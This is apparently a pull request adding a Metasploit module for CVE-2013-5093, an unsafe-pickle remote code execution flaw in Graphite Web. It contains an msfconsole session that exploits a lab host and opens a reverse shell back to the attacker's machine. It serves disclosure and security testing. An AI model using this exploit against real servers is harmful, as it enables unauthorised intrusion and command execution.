Graphite web: http://graphite.wikidot.com/
Versions affected: 0.9.5 up till and including 0.9.10
Installation guide: https://gist.github.com/jgeurts/3112065
The vulnerability was introduced in: graphite-project/graphite-web@71d395e
Note that in webapp/web/render/views.py, which is a publicly accessible URL by default(I have found no way of restricting access), a pickle can be loaded. Pickles are unsafe as they can contain commands that will be executed.
The routing for the exploit goes as following, as defined in webapp/web/render/views.py:
The request to trigger it has to formatted like:
Chart type, as an example, can be "line". This is then followed by a linebreak and then the pickle.
msf > use exploit/unix/webapp/graphite_pickle_exec
msf exploit(graphite_pickle_exec) > show options
Module options (exploit/unix/webapp/graphite_pickle_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
TARGETURI / yes The path to a vulnerable application
VHOST no HTTP server virtual host
msf exploit(graphite_pickle_exec) > set RHOST 192.168.80.149
RHOST => 192.168.80.149
msf exploit(graphite_pickle_exec) > check
[*] The target appears to be vulnerable.
msf exploit(graphite_pickle_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 39Dm9uxcphKQ5GwX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "39Dm9uxcphKQ5GwX\r\n"
[*] B is input...
[*] Command shell session 1 opened (192.168.80.129:4444 -> 192.168.80.149:57141) at 2013-08-07 19:14:59 -0400
Adding module for CVE 2013-5093, Graphite Web Exploit
This is a really good example of this type of vulnerability! Thanks!
Just asking the author to repeat pr from a different branch than his master, as pointed on rapid7 wiki
Changes Unknown when pulling 3053233 on CharlieEriksen:master into ** on rapid7:master**.